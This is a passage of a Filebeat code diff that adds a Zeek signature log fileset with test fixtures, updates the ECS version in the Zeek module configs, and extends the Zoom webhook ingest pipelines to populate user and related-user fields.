- /var/log/bro/current/signatures.log + os.darwin: + - /usr/local/var/logs/current/signatures.log + - name: tags + default: [zeek.signature] + +ingest_pipeline: ingest/pipeline.yml +input: config/signature.yml + +requires.processors: +- name: geoip + plugin: ingest-geoip diff --git a/x-pack/filebeat/module/zeek/signature/test/signature-json.log b/x-pack/filebeat/module/zeek/signature/test/signature-json.log new file mode 100644 index 000000000000..4725117d90e6 --- /dev/null +++ b/x-pack/filebeat/module/zeek/signature/test/signature-json.log @@ -0,0 +1 @@ +{"ts": 1611852809.869245,"uid": "CbjAXE4CBxJ8W7VoJg","src_addr": "124.51.137.154","src_port": 51617,"dst_addr": "160.218.27.63","dst_port": 445,"note": "Signatures::Sensitive_Signature","sig_id": "my-second-sig","event_msg": "124.51.137.154: TCP traffic","sub_msg": ""} diff --git a/x-pack/filebeat/module/zeek/signature/test/signature-json.log-expected.json b/x-pack/filebeat/module/zeek/signature/test/signature-json.log-expected.json new file mode 100644 index 000000000000..d06eb256245b --- /dev/null +++ b/x-pack/filebeat/module/zeek/signature/test/signature-json.log-expected.json @@ -0,0 +1,48 @@ +[ + { + "@timestamp": "2021-01-28T16:53:29.869Z", + "destination.address": "160.218.27.63", + "destination.as.number": 5610, + "destination.as.organization.name": "O2 Czech Republic, a.s.", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "CZ", + "destination.geo.country_name": "Czechia", + "destination.geo.location.lat": 50.0848, + "destination.geo.location.lon": 14.4112, + "destination.ip": "160.218.27.63", + "destination.port": 445, + "event.dataset": "zeek.signature", + "event.kind": "alert", + "event.module": "zeek", + "event.original": "{\"ts\": 1611852809.869245,\"uid\": \"CbjAXE4CBxJ8W7VoJg\",\"src_addr\": \"124.51.137.154\",\"src_port\": 51617,\"dst_addr\": \"160.218.27.63\",\"dst_port\": 445,\"note\": \"Signatures::Sensitive_Signature\",\"sig_id\": \"my-second-sig\",\"event_msg\": \"124.51.137.154: TCP traffic\",\"sub_msg\": \"\"}", + "fileset.name": "signature", + "input.type": "log", + "log.offset": 0, + "related.ip": [ + "124.51.137.154", + "160.218.27.63" + ], + "rule.description": "124.51.137.154: TCP traffic", + "rule.id": "my-second-sig", + "service.type": "zeek", + "source.address": "124.51.137.154", + "source.as.number": 17858, + "source.as.organization.name": "LG POWERCOMM", + "source.geo.city_name": "Busan", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "KR", + "source.geo.country_name": "South Korea", + "source.geo.location.lat": 35.1003, + "source.geo.location.lon": 129.0442, + "source.geo.region_iso_code": "KR-26", + "source.geo.region_name": "Busan", + "source.ip": "124.51.137.154", + "source.port": 51617, + "tags": [ + "zeek.signature" + ], + "zeek.session_id": "CbjAXE4CBxJ8W7VoJg", + "zeek.signature.note": "Signatures::Sensitive_Signature", + "zeek.signature.sub_msg": "" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/zeek/sip/config/sip.yml b/x-pack/filebeat/module/zeek/sip/config/sip.yml index 09501c99ff81..3530b53ce8b6 100644 --- a/x-pack/filebeat/module/zeek/sip/config/sip.yml +++ b/x-pack/filebeat/module/zeek/sip/config/sip.yml @@ -95,4 +95,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml b/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml index 514e086e76be..7b0ba2dd6dc5 100644 --- a/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml +++ b/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml @@ -101,4 +101,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml b/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml index e61da9cb365c..aa530a6f0de5 100644 --- a/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml +++ b/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml @@ -61,4 +61,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml b/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml index c1e7908205d3..414432e30a64 100644 --- a/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml +++ b/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml @@ -57,4 +57,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/smtp/config/smtp.yml b/x-pack/filebeat/module/zeek/smtp/config/smtp.yml index f6abbf966168..cf31baf7d0cf 100644 --- a/x-pack/filebeat/module/zeek/smtp/config/smtp.yml +++ b/x-pack/filebeat/module/zeek/smtp/config/smtp.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/snmp/config/snmp.yml b/x-pack/filebeat/module/zeek/snmp/config/snmp.yml index 1b4587e32982..b508ee874dfa 100644 --- a/x-pack/filebeat/module/zeek/snmp/config/snmp.yml +++ b/x-pack/filebeat/module/zeek/snmp/config/snmp.yml @@ -69,4 +69,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/socks/config/socks.yml b/x-pack/filebeat/module/zeek/socks/config/socks.yml index 72ef4e99d53e..cc486a60c403 100644 --- a/x-pack/filebeat/module/zeek/socks/config/socks.yml +++ b/x-pack/filebeat/module/zeek/socks/config/socks.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/ssh/config/ssh.yml b/x-pack/filebeat/module/zeek/ssh/config/ssh.yml index c72f44249889..14e673c3e047 100644 --- a/x-pack/filebeat/module/zeek/ssh/config/ssh.yml +++ b/x-pack/filebeat/module/zeek/ssh/config/ssh.yml @@ -76,4 +76,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/ssl/config/ssl.yml b/x-pack/filebeat/module/zeek/ssl/config/ssl.yml index c64a851913de..cf3281a5d76c 100644 --- a/x-pack/filebeat/module/zeek/ssl/config/ssl.yml +++ b/x-pack/filebeat/module/zeek/ssl/config/ssl.yml @@ -94,4 +94,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/stats/config/stats.yml b/x-pack/filebeat/module/zeek/stats/config/stats.yml index 3bbd773979ea..a8fcb0ce6b9d 100644 --- a/x-pack/filebeat/module/zeek/stats/config/stats.yml +++ b/x-pack/filebeat/module/zeek/stats/config/stats.yml @@ -97,4 +97,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/syslog/config/syslog.yml b/x-pack/filebeat/module/zeek/syslog/config/syslog.yml index cecb93d857d3..167e7ea95690 100644 --- a/x-pack/filebeat/module/zeek/syslog/config/syslog.yml +++ b/x-pack/filebeat/module/zeek/syslog/config/syslog.yml @@ -57,4 +57,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml b/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml index 47bc7d2f99c7..35671bd15a46 100644 --- a/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml +++ b/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml @@ -45,4 +45,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml b/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml index 0186311141c7..8bf2bd3ed48b 100644 --- a/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml +++ b/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml @@ -56,4 +56,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/weird/config/weird.yml b/x-pack/filebeat/module/zeek/weird/config/weird.yml index 4d3248b4515e..317001ec2e44 100644 --- a/x-pack/filebeat/module/zeek/weird/config/weird.yml +++ b/x-pack/filebeat/module/zeek/weird/config/weird.yml @@ -56,4 +56,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/x509/config/x509.yml b/x-pack/filebeat/module/zeek/x509/config/x509.yml index 25b4c0a54197..0f9b418e4fa0 100644 --- a/x-pack/filebeat/module/zeek/x509/config/x509.yml +++ b/x-pack/filebeat/module/zeek/x509/config/x509.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zoom/webhook/config/webhook.yml b/x-pack/filebeat/module/zoom/webhook/config/webhook.yml index 6c2ed13fdbad..34f0d4a6a549 100644 --- a/x-pack/filebeat/module/zoom/webhook/config/webhook.yml +++ b/x-pack/filebeat/module/zoom/webhook/config/webhook.yml @@ -34,4 +34,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/account.yml b/x-pack/filebeat/module/zoom/webhook/ingest/account.yml index c5368f0ab05f..605ea1974ff3 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/account.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/account.yml @@ -37,10 +37,80 @@ processors: field: zoom.object target_field: zoom.account ignore_missing: true +# +# set user.target from account.owner_* fields (create / delete account). +# +- set: + field: user.target.id + value: '{{zoom.account.owner_id}}' + ignore_empty_value: true +- set: + field: user.target.email + value: '{{zoom.account.owner_email}}' + ignore_empty_value: true + +# +# set user.target from old_values.account_* fields (updated account). +# +- set: + field: user.target.id + value: '{{zoom.old_values.id}}' + if: 'ctx.zoom?.old_values?.id != null' +- set: + field: user.target.email + value: '{{zoom.old_values.account_email}}' + if: 'ctx.zoom?.old_values?.account_email != null' +- set: + field: user.target.full_name + value: '{{zoom.old_values.account_name}}' + if: 'ctx.zoom?.old_values?.account_name != null' +- set: + field: user.target.name + value: '{{zoom.old_values.account_alias}}' + if: 'ctx.zoom?.old_values?.account_alias != null' + +# +# set user.changes from account.account_* fields (updated account). +# +- set: + field: user.changes.id + value: '{{zoom.account.id}}' + if: 'ctx.zoom?.account?.id != null && ctx.zoom?.old_values?.id != ctx.zoom?.account?.id' +- set: + field: user.changes.email + value: '{{zoom.account.account_email}}' + if: 'ctx.zoom?.account?.account_email != null && ctx.zoom?.old_values?.account_email != ctx.zoom?.account?.account_email' +- set: + field: user.changes.full_name + value: '{{zoom.account.account_name}}' + if: 'ctx.zoom?.account?.account_name != null && ctx.zoom?.old_values?.account_name != ctx.zoom?.account?.account_name' +- set: + field: user.changes.name + value: '{{zoom.account.account_alias}}' + if: 'ctx.zoom?.account?.account_alias != null && ctx.zoom?.old_values?.account_alias != ctx.zoom?.account?.account_alias' + +# +# Append to related.user array +# - append: field: related.user value: "{{zoom.account.owner_id}}" - if: ctx?.zoom?.account?.owner_id != null + allow_duplicates: false + if: ctx.zoom?.account?.owner_id != null +- append: + field: related.user + value: "{{user.target.id}}" + allow_duplicates: false + if: ctx.user?.target?.id != null +- append: + field: related.user + value: "{{user.changes.id}}" + allow_duplicates: false + if: ctx.user?.changes?.id != null + +# +# Cleanup +# - remove: field: zoom.time_stamp ignore_missing: true diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/chat_channel.yml b/x-pack/filebeat/module/zoom/webhook/ingest/chat_channel.yml index 8f3140d2799b..98d6fcbcd900 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/chat_channel.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/chat_channel.yml @@ -44,6 +44,7 @@ processors: if: ctx?.zoom?.chat_channel?.timestamp != null - foreach: field: zoom.chat_channel.members + ignore_missing: true processor: append: field: related.user diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/meeting.yml b/x-pack/filebeat/module/zoom/webhook/ingest/meeting.yml index e0012edf8e4d..9291add35933 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/meeting.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/meeting.yml @@ -45,10 +45,47 @@ processors: target_field: url.full ignore_missing: true if: ctx?.url?.full == null + +# +# Set user.* from participant, if any. +# +- remove: + field: + - user + ignore_missing: true + if: 'ctx.zoom?.participant != null' +- set: + field: user.id + value: '{{zoom.participant.id}}' + ignore_empty_value: true +- set: + field: user.full_name + value: '{{zoom.participant.user_name}}' + ignore_empty_value: true + +# +# Set user.id to be the meeting's host, unless already set. +# +- set: + field: user.id + value: '{{zoom.meeting.host_id}}' + ignore_empty_value: true + override: false + +# +# Append to related.user +# +- append: + field: related.user + value: "{{zoom.participant.id}}" + allow_duplicates: false + if: 'ctx.zoom?.participant?.id != null' - append: field: related.user value: "{{zoom.meeting.host_id}}" - if: ctx?.zoom?.meeting?.host_id != null + allow_duplicates: false + if: 'ctx.zoom?.meeting?.host_id != null' + - date: field: zoom.meeting.start_time target_field: event.start diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/phone.yml b/x-pack/filebeat/module/zoom/webhook/ingest/phone.yml index 2e363e3da422..b836cd9c96c4 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/phone.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/phone.yml @@ -140,19 +140,30 @@ processors: - append: field: related.user value: "{{zoom.phone.callee.user_id}}" + allow_duplicates: false if: ctx?.zoom?.phone?.callee?.user_id != null - append: field: related.user value: "{{zoom.phone.callee_user_id}}" + allow_duplicates: false if: ctx?.zoom?.phone?.callee_user_id != null - append: field: related.user value: "{{zoom.phone.caller.user_id}}" + allow_duplicates: false if: ctx?.zoom?.phone?.caller?.user_id != null - remove: field: zoom.phone.date_time ignore_missing: true if: ctx?.event?.action == 'phone.voicemail_received' +- set: + field: source.user.id + value: '{{zoom.phone.caller.user_id}}' + ignore_empty_value: true +- set: + field: destination.user.id + value: '{{zoom.phone.callee.user_id}}' + ignore_empty_value: true on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/pipeline.yml b/x-pack/filebeat/module/zoom/webhook/ingest/pipeline.yml index 95c95cba215e..4c114b5e08c9 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/pipeline.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/pipeline.yml @@ -43,7 +43,18 @@ processors: - append: field: related.user value: "{{zoom.operator_id}}" - if: "ctx?.zoom?.operator_id != null" + if: "ctx.zoom?.operator_id != null" +# Set user.id from operator data (user who performs an action). +- set: + field: user.id + value: "{{zoom.operator_id}}" + if: "ctx.zoom?.operator_id != null" +# Set user.name from operator data only when user.id also set above. +- set: + field: user.email + value: "{{zoom.operator}}" + ignore_empty_value: true + if: "ctx.zoom?.operator_id != null" # Removing some fields that have complex nested arrays that might impact performance - remove: field: diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/recording.yml b/x-pack/filebeat/module/zoom/webhook/ingest/recording.yml index 9e5ba923b129..715f46bcbd93 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/recording.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/recording.yml @@ -46,13 +46,21 @@ processors: - UNIX_MS if: ctx?.event?.action == 'recording.renamed' ignore_failure: true +- remove: + field: zoom.recording.recording_file.recording_start + if: 'ctx.zoom?.recording?.recording_file?.recording_start == ""' +- remove: + field: zoom.recording.recording_file.recording_end + if: 'ctx.zoom?.recording?.recording_file?.recording_end == ""' - set: field: event.start value: '{{ zoom.recording.recording_file.recording_start }}' + ignore_empty_value: true if: ctx?.event?.action == 'recording.started' - set: field: event.end value: '{{ zoom.recording.recording_file.recording_end }}' + ignore_empty_value: true if: ctx?.event?.action == 'recording.stopped' - script: lang: painless @@ -74,12 +82,32 @@ processors: if: "ctx?.zoom?.recording?.host_id != null" - append: field: related.user - value: "{{zoom.recording.registrant.id}}" - if: "ctx?.zoom?.recording?.registrant?.id != null" + value: "{{zoom.registrant.id}}" + if: "ctx?.zoom?.registrant?.id != null" - remove: field: zoom.time_stamp ignore_missing: true if: ctx?.event?.action == 'recording.renamed' +- set: + field: 'user.email' + value: '{{zoom.registrant.email}}' + ignore_empty_value: true + if: 'ctx.user?.id == null && ctx.zoom?.registrant != null' +- set: + field: 'user.full_name' + value: '{{zoom.registrant.first_name}} {{zoom.registrant.last_name}}' + ignore_empty_value: true + if: 'ctx.user?.id == null && ctx.zoom?.registrant != null' +- set: + field: 'user.id' + value: '{{zoom.registrant.id}}' + ignore_empty_value: true + if: 'ctx.user?.id == null && ctx.zoom?.registrant != null' +- set: + field: 'user.id' + value: '{{zoom.recording.host_id}}' + ignore_empty_value: true + if: 'ctx.zoom?.registrant == null' on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/user.yml b/x-pack/filebeat/module/zoom/webhook/ingest/user.yml index 2f7a82bfc758..bf5f4afea4f9 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/user.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/user.yml @@ -5,11 +5,11 @@ processors: value: configuration if: "['user.settings_updated'].contains(ctx?.event?.action)" - append: - field: event.type + field: event.category value: iam if: "!['user.signed_in', 'user.signed_out'].contains(ctx?.event?.action)" - append: - field: event.type + field: event.category value: authentication if: "['user.signed_in', 'user.signed_out'].contains(ctx?.event?.action)" - append: @@ -59,6 +59,129 @@ processors: - zoom.time_stamp - zoom.user.date_time ignore_missing: true + +# +# set user.* from operator. +# +- set: + field: user.id + value: '{{zoom.operator_id}}' + ignore_empty_value: true +- set: + field: user.email + value: '{{zoom.operator}}' + ignore_empty_value: true + +# +# set user.* from user object when there's no operator. +# +- set: + field: user.id + value: '{{zoom.user.id}}' + ignore_empty_value: true + if: 'ctx.zoom?.operator == null && ctx.zoom?.operator_id == null' +- set: + field: user.email + value: '{{zoom.user.email}}' + ignore_empty_value: true + if: 'ctx.zoom?.operator == null && ctx.zoom?.operator_id == null' +- set: + field: user.full_name + value: '{{zoom.user.first_name}} {{zoom.user.last_name}}' + ignore_empty_value: true + if: 'ctx.zoom?.operator == null && ctx.zoom?.operator_id == null && ctx.zoom?.user?.first_name != null' + +# +# set user.target.* from old_values +# +- set: + field: user.target.id + value: '{{zoom.old_values.id}}' + ignore_empty_value: true +- set: + field: user.target.id + value: '{{zoom.old_values.id}}' + ignore_empty_value: true +- set: + field: user.target.email + value: '{{zoom.old_values.email}}' + ignore_empty_value: true +- set: + field: user.target.email + value: '{{zoom.old_values.email}}' + ignore_empty_value: true +- set: + field: user.target.full_name + value: '{{zoom.old_values.first_name}} {{zoom.old_values.last_name}}' + if: 'ctx.zoom?.old_values?.first_name != null' + +# +# set user.target.* from user.* without overriding old_values. +# This is necessary because some fields doesn't exist in old_values. +# +- set: + field: user.target.id + value: '{{zoom.user.id}}' + ignore_empty_value: true + override: false + if: 'ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null' +- set: + field: user.target.id + value: '{{zoom.user.id}}' + ignore_empty_value: true + override: false + if: 'ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null' +- set: + field: user.target.email + value: '{{zoom.user.email}}' + ignore_empty_value: true + override: false + if: 'ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null' +- set: + field: user.target.email + value: '{{zoom.user.email}}' + ignore_empty_value: true + override: false + if: 'ctx.zoom?.old_values != null' +- set: + field: user.target.full_name + value: '{{zoom.user.first_name}} {{zoom.user.last_name}}' + if: '(ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null) && ctx.zoom?.user?.first_name != null' + override: false + +# +# set user.changes.* from user object when there's old_values +# +- set: + field: user.changes.id + value: '{{zoom.user.id}}' + ignore_empty_value: true + if: 'ctx.zoom?.old_values?.id != null && ctx.zoom?.old_values?.id != ctx.zoom?.user?.id' +- set: + field: user.changes.email + value: '{{zoom.user.email}}' + ignore_empty_value: true + if: 'ctx.zoom?.old_values?.email != null && ctx.zoom?.old_values?.email != ctx.zoom?.user?.email' +- set: + field: user.changes.full_name + value: '{{zoom.user.first_name}} {{zoom.user.last_name}}' + ignore_empty_value: true + if: 'ctx.zoom?.old_values?.first_name != null && ctx.zoom?.old_values?.last_name != null && (ctx.zoom?.old_values?.last_name != ctx.zoom?.user?.last_name || ctx.zoom?.old_values?.first_name != ctx.zoom?.user?.first_name)' + +# +# append to related.user +# +- append: + field: related.user + value: "{{zoom.user.id}}" + allow_duplicates: false + if: "ctx.zoom?.user?.id != null" +- append: + field: related.user + value: "{{zoom.old_values.id}}" + allow_duplicates: false + if: "ctx.zoom?.old_values?.id != null" + on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/webinar.yml b/x-pack/filebeat/module/zoom/webhook/ingest/webinar.yml index f136fab304e5..0cd605fbf162 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/webinar.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/webinar.yml @@ -68,14 +68,73 @@ processors: - ISO_INSTANT if: ctx?.event?.action == 'webinar.participant_left' ignore_failure: true + +# +# set user.* from participant +# +- set: + field: user.id + value: '{{zoom.participant.id}}' + ignore_empty_value: true + if: 'ctx.zoom?.participant != null' +- set: + field: user.full_name + value: '{{zoom.participant.user_name}}' + ignore_empty_value: true + if: 'ctx.zoom?.participant != null' + +# +# set user.* from registrant +# +- set: + field: user.id + value: '{{zoom.registrant.id}}' + ignore_empty_value: true + if: 'ctx.zoom?.registrant != null' +- set: + field: user.email + value: '{{zoom.registrant.email}}' + ignore_empty_value: true + if: 'ctx.zoom?.registrant != null' +- set: + field: user.full_name + value: '{{zoom.registrant.first_name}} {{zoom.registrant.last_name}}' + ignore_empty_value: true + if: 'ctx.zoom?.registrant != null' + +# +# set user.* from operator +# +- set: + field: user.id + value: '{{zoom.operator_id}}' + ignore_empty_value: true + if: 'ctx.zoom?.registrant == null && ctx.zoom?.participant == null' +- set: + field: user.email + value: '{{zoom.operator}}' + ignore_empty_value: true + if: 'ctx.zoom?.registrant == null && ctx.zoom?.participant == null' + +# +# append to related.user +# - append: field: related.user value: "{{zoom.webinar.host_id}}" - if: "ctx?.zoom?.webinar?.host_id != null" + allow_duplicates: false + if: "ctx.zoom?.webinar?.host_id != null" +- append: + field: related.user + value: "{{zoom.registrant.id}}" + allow_duplicates: false + if: "ctx.zoom?.registrant?.id != null" - append: field: related.user - value: "{{zoom.webinar.participant.user_id}}" - if: "ctx?.zoom?.webinar?.participant?.user_id != null" + value: "{{zoom.participant.id}}" + allow_duplicates: false + if: "ctx.zoom?.participant?.id != null" + on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/zoom/webhook/ingest/zoomroom.yml b/x-pack/filebeat/module/zoom/webhook/ingest/zoomroom.yml index 5c464b8ddd50..8a7370ed2463 100644 --- a/x-pack/filebeat/module/zoom/webhook/ingest/zoomroom.yml +++ b/x-pack/filebeat/module/zoom/webhook/ingest/zoomroom.yml @@ -16,10 +16,6 @@ processors: field: zoom.object target_field: zoom.zoomroom ignore_missing: true -- append: - field: related.user - value: "{{zoom.user.id}}" - if: "ctx?.zoom?.user?.id != null" on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/zoom/webhook/test/account.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/account.ndjson.log-expected.json index 34d5e7363e7e..cb63b4bead73 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/account.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/account.ndjson.log-expected.json @@ -28,6 +28,10 @@ "zoom-webhook", "forwarded" ], + "user.email": "youramazingemailhere@somemail.com", + "user.id": "uLohghhRgfgrbTayCX6r2Q_qQsQ", + "user.target.email": "thesubaccountowneremail@somemail.com", + "user.target.id": "e2ZHO5RSGqyfrmFnElxw", "zoom.account.owner_email": "thesubaccountowneremail@somemail.com", "zoom.account.owner_id": "e2ZHO5RSGqyfrmFnElxw", "zoom.master_account_id": "lq8KK_EoRCq6ByEyA73qCA", @@ -56,13 +60,21 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "iKoRgfbaTazDX6r2Q_eQsQL" + "iKoRgfbaTazDX6r2Q_eQsQL", + "eFs_EGRCq6ByEyA73qCA" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.changes.full_name": "Michael Harris", + "user.changes.name": "MH", + "user.email": "theoperatoremail@someemail.com", + "user.id": "iKoRgfbaTazDX6r2Q_eQsQL", + "user.target.full_name": "Mike Harris", + "user.target.id": "eFs_EGRCq6ByEyA73qCA", + "user.target.name": "", "zoom.account.account_alias": "MH", "zoom.account.account_name": "Michael Harris", "zoom.master_account_id": "abKKcd_IGRCq63yEy673lCA", @@ -102,6 +114,10 @@ "zoom-webhook", "forwarded" ], + "user.email": "youremail@someemail.com", + "user.id": "gdjfdhjLsuhfvhjd", + "user.target.email": "theowneremail@someemail.com", + "user.target.id": "eZbcHO5RSGqyKAUmFnElxw", "zoom.account.owner_email": "theowneremail@someemail.com", "zoom.account.owner_id": "eZbcHO5RSGqyKAUmFnElxw", "zoom.master_account_id": "aBcd_dgfoeq6ByEyA73qCA", diff --git a/x-pack/filebeat/module/zoom/webhook/test/chat_channel.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/chat_channel.ndjson.log-expected.json index 100d3fbeea94..97dfbf0338d0 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/chat_channel.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/chat_channel.ndjson.log-expected.json @@ -25,6 +25,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "somememai@gmtsffjdfhail.com", + "user.id": "z8dfgdfguQrdfgdf", "zoom.account_id": "vbbvnvAdsfe", "zoom.chat_channel.id": "6dfgdfgdg444447b0egga", "zoom.chat_channel.name": "Delivering Happiness", @@ -32,6 +34,72 @@ "zoom.operator": "somememai@gmtsffjdfhail.com", "zoom.operator_id": "z8dfgdfguQrdfgdf" }, + { + "event.action": "chat_channel.updated", + "event.dataset": "zoom.webhook", + "event.kind": [ + "event" + ], + "event.module": "zoom", + "event.timezone": "-02:00", + "event.type": [ + "change" + ], + "fileset.name": "webhook", + "input.type": "log", + "log.offset": 403, + "observer.product": "Webhook", + "observer.vendor": "Zoom", + "related.user": [ + "z8dfgdfguQrdfgdf" + ], + "service.type": "zoom", + "tags": [ + "zoom-webhook", + "forwarded" + ], + "user.email": "somememai@gmtsffjdfhail.com", + "user.id": "z8dfgdfguQrdfgdf", + "zoom.account_id": "vbbvnvAdsfe", + "zoom.chat_channel.id": "6dfgdfgdg444447b0egga", + "zoom.chat_channel.name": "Building Happy", + "zoom.chat_channel.type": 1, + "zoom.operator": "somememai@gmtsffjdfhail.com", + "zoom.operator_id": "z8dfgdfguQrdfgdf" + }, + { + "event.action": "chat_channel.deleted", + "event.dataset": "zoom.webhook", + "event.kind": [ + "event" + ], + "event.module": "zoom", + "event.timezone": "-02:00", + "event.type": [ + "deletion" + ], + "fileset.name": "webhook", + "input.type": "log", + "log.offset": 683, + "observer.product": "Webhook", + "observer.vendor": "Zoom", + "related.user": [ + "z8dfgdfguQrdfgdf" + ], + "service.type": "zoom", + "tags": [ + "zoom-webhook", + "forwarded" + ], + "user.email": "somememai@gmtsffjdfhail.com", + "user.id": "z8dfgdfguQrdfgdf", + "zoom.account_id": "vbbvnvAdsfe", + "zoom.chat_channel.id": "6dfgdfgdg444447b0egga", + "zoom.chat_channel.name": "Building Happy", + "zoom.chat_channel.type": 1, + "zoom.operator": "somememai@gmtsffjdfhail.com", + "zoom.operator_id": "z8dfgdfguQrdfgdf" + }, { "event.action": "chat_channel.member_invited", "event.dataset": "zoom.webhook", @@ -57,6 +125,74 @@ "zoom-webhook", "forwarded" ], + "user.email": "somememai@gmtsffjdfhail.com", + "user.id": "z8dfgdfguQrdfgdf", + "zoom.account_id": "vbbvnvAdsfe", + "zoom.chat_channel.id": "6dfgdfgdg444447b0egga", + "zoom.chat_channel.name": "Delivering Happiness", + "zoom.chat_channel.type": 1, + "zoom.operator": "somememai@gmtsffjdfhail.com", + "zoom.operator_id": "z8dfgdfguQrdfgdf" + }, + { + "event.action": "chat_channel.member_joined", + "event.dataset": "zoom.webhook", + "event.kind": [ + "event" + ], + "event.module": "zoom", + "event.timezone": "-02:00", + "event.type": [ + "user" + ], + "fileset.name": "webhook", + "input.type": "log", + "log.offset": 1311, + "observer.product": "Webhook", + "observer.vendor": "Zoom", + "related.user": [ + "z8dfgdfguQrdfgdf" + ], + "service.type": "zoom", + "tags": [ + "zoom-webhook", + "forwarded" + ], + "user.email": "somememai@gmtsffjdfhail.com", + "user.id": "z8dfgdfguQrdfgdf", + "zoom.account_id": "vbbvnvAdsfe", + "zoom.chat_channel.id": "6dfgdfgdg444447b0egga", + "zoom.chat_channel.name": "Delivering Happiness", + "zoom.chat_channel.type": 1, + "zoom.operator": "somememai@gmtsffjdfhail.com", + "zoom.operator_id": "z8dfgdfguQrdfgdf" + }, 